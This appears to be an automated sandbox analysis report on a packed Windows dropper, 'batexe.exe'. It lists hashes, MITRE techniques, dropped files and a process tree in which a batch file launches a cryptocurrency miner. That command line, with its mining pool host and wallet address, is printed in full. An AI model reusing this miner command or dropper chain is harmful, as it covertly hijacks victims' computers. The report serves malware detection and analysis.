73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
295s
max time network
301s
platform
windows10-2004_x64
resource
win10v2004-20231215-ja
resource tags

arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
19/02/2024, 19:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
1160	b2e.exe
3252	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
3252	cpuminer-sse2.exe
3252	cpuminer-sse2.exe
3252	cpuminer-sse2.exe
3252	cpuminer-sse2.exe
3252	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/1744-8-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 1744 wrote to memory of 1160	1744	batexe.exe	72
PID 1744 wrote to memory of 1160	1744	batexe.exe	72
PID 1744 wrote to memory of 1160	1744	batexe.exe	72
PID 1160 wrote to memory of 1640	1160	b2e.exe	86
PID 1160 wrote to memory of 1640	1160	b2e.exe	86
PID 1160 wrote to memory of 1640	1160	b2e.exe	86
PID 1640 wrote to memory of 3252	1640	cmd.exe	89
PID 1640 wrote to memory of 3252	1640	cmd.exe	89

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1744
- C:\Users\Admin\AppData\Local\Temp\594B.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\594B.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\594B.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1160
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\5BFB.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1640
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:3252

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\594B.tmp\b2e.exe

Filesize
587KB

MD5
fea1c01b23aa64a9ec039112ed7ed8bf

SHA1
2e4d9e66d1bf77e8cc98f8448a95583d937e1479

SHA256
cec04776370255aad7163575583cdcc2ad44bf493a013bf72779b000e4d12f4a

SHA512
4b2af6494bc407c92533ee11ec9fe15a03ff9deb7cf4bd8d73c522f9291ac45a4fc743d4fe370b6fcd032303384ff80f9789bc98117ef7567b64f926574bf0bb

Download Submit
C:\Users\Admin\AppData\Local\Temp\594B.tmp\b2e.exe

Filesize
311KB

MD5
c25f078d854b6eecafea08422d400be9

SHA1
d1fd6dde1ce96d9d271d3ded78e08a05c079460b

SHA256
5eb351b2b0126a67614e4a649255ea3fcebb8b8f29966e4ec41b91b28f5e8fa8

SHA512
c32a82e23b57c2270078fd1e6819c723c1f270e61e3eae738178898d0d5c5023252b7638ee0753e311fbd955a7e5967a8087917f56e4b4d6728580e462ab35f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\594B.tmp\b2e.exe

Filesize
383KB

MD5
a0722090ec22ddd524394dc8a29b881f

SHA1
9dc74e600c470551f9502e0d2c8d1ab8cefb9d25

SHA256
79832d1aaefb4351b534f10e5731790f044bfd367e9a428b1e3b7bae437cc743

SHA512
6b0aafcd8e74c5b13adc2a37141730f18dcf67e148601d6b62e18030322834d86af8d618175069d5c24400bd4beaa73f04e9864df03ff70064bb3f7ff1193d89

Download Submit
C:\Users\Admin\AppData\Local\Temp\5BFB.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
342KB

MD5
ef8bd5632886c483d385a61fbd471188

SHA1
492d35371807a1c2d45a106a6cdc054c03b68d82

SHA256
20721371bfe84a0829c53f675839877dca6b871e794b3cf38db6a2a522921355

SHA512
35d55320417832a1f7c7d878068dc39c39859967a3d305c0557ae6e35c77298e629f66f64c33ba5f5d10dad6311dcc6225c427d31f3a6a72c2e07a2afe82c7aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
333KB

MD5
325eddc9f624b8f5b43f95c3fdf1e50c

SHA1
b1253f1ac79f179bcae6d6f2dd865005b5f263a9

SHA256
46abf0be4bd961acb71f309ea81a1ecf5529175da2dd04492db3f1f44dda90e8

SHA512
e8aca9915ef2b842b46a4fa7487ae564b454320002c52e60c1a069f7041ea032cb9a0eb833b64a43b6dafd463d94013f8d3acca4fb8d622e3a5ebdc62c6f734a

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
320KB

MD5
9abc2d6fe180a37b542f3bf99c5d8a02

SHA1
5e790ae05ec1b186913b623aced47d297624505e

SHA256
eb1c9a5381930635bc73148bf8e4110f8d63016c12c2e0fae83250f9c448a355

SHA512
14edf6aecd8d06274489862a2c9c3f44e88cf151de58fe80499747a5f702635496a29e290f3e6f09241861024c12a570b20e44367e19326824ed20edb64c98b6

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
455KB

MD5
70da085c27d57f71eb905742c625bac0

SHA1
c752c4959659f55f3f97368472af78cb32c3811b

SHA256
afed1d669d4bc37657f90f6c5cb95942de9817f0e14aa480fce13baa63605229

SHA512
6d0c5cf24488df40331e14ebba10f63f7d43d9399ee427d02cb3d400abaf8ee7c3538a34ce8b6769aaf90c013d6237f579901b20d7bb8c7d79618bff49653a14

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
29KB

MD5
16346bed1eda23c10aedf446308160fd

SHA1
8f3c2504ecea24d623de72be6a1f3f88ab81c39b

SHA256
4b3adf842053b2176220b6d8c772e10f2069cb8c332b26b0d80728d607007b83

SHA512
4d0764f8d27dcea55db6d5abffe679af5676c1e636f0bcc044a2898e8dbd4c2de5203b37b84a5825a7c43aa888d60921ec9000ca070f08b83759bd4424f1d07d

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
342KB

MD5
5e927cbf1c58ff2a9e6387b5449a594b

SHA1
41878ce55789632331c2665529a0a3349c8ed70d

SHA256
ee31afeba5011c397cfde20da4417b04ac4893164ca820d94f49e3016876579a

SHA512
fb6458232802bd33f8532813ed08065c73cd66ec27d7ca61f51d2f595a854d1120e35ae37d34ee64bf8d936ddbb3ca82d80dfff7fe4aa50a820790019b0e7562

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
32KB

MD5
b5ee2ecfeb4202d3e8b80c60fe8c98f4

SHA1
f4c7678c3241776d53736f224f09d2cd49ec0876

SHA256
c8095b7b9c67c5c3106a7469febc09bba50b3a384bfb98bf0fba0a4a22c36844

SHA512
17190c52d497237abec71f569306b8f9cc36104ef89f002ab366702892cfae8311a7f4ac5ecb410b173932d3c5f3ebd0b16158d26a0e90c9dc029b3e805db543

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
434KB

MD5
d9e4de1938ccdb97fb8c64bdc6732248

SHA1
50906c7ac7f0b4b55d5aa79aadc1c8e62f872094

SHA256
bd55e9678c616c987e26a3e026f76def805da213378697d8497ed7c6a94a619f

SHA512
18274322fe30feaac75cb73a620691b866a0ece502f81728f018e99c4d7f15e8b600834ad2519b575af132c597b58e14e3bd7e4a6c01d1df431cd0fe179b5491

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
149KB

MD5
31325ee097b2686dd3f7ed3c46dca632

SHA1
b0f57a72c2b5d73f2a3b64937f3c442d4c1892b0

SHA256
a8695fed44df7301297f77490b02ecb540f18663e0023f9bbe956e9ab1adada8

SHA512
0b6b4ebd9c5437aee23455b1aa41814b413a9f8fb6257ddb7984254aa0c2fe6b50bc8829eed15295bce4b0c7476732a8f2f660cb72587f639c29bc63b8cc64f7

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
368KB

MD5
ef47272543eba722b4d8e902431e4208

SHA1
df59be565b9051a17c7c21bf9e50dc5c1dc29078

SHA256
8f46f6941285af191a1fe2c89f15c65cdfe3986772245ffa37ed8dabe9c6c8c6

SHA512
4c00a1db992be74e6c50793a8cd9a6e7598190f761837553fa7e97403c15ffc232fa3332a93dab9642affaeda472e4ae17cae3ce463041f1a251a11829944e29

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
367KB

MD5
41217be4144b5551c1b2df7e883b01fa

SHA1
a8fa0c068233d97656d878d29303b39af2721fbd

SHA256
d16b777fa8214b8fa07e483ff5f1fdd808fa7779d0b3904642a36d8dcf4fb688

SHA512
e14e8f8e9d2be69ce414c1a9ae01e6257f0b61a7ff07a38c34f541c024b651df1f147cfeb5e14162f8f1a6002b2c0f56f9e868084223faa4e486237ba4c8204a

Download Submit
memory/1160-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/1160-9-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/1744-8-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/3252-45-0x0000000072210000-0x00000000722A8000-memory.dmp

Filesize
608KB

Download
memory/3252-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/3252-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3252-47-0x0000000000E10000-0x00000000026C5000-memory.dmp

Filesize
24.7MB

Download
memory/3252-48-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3252-46-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/3252-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3252-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3252-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3252-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3252-94-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3252-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download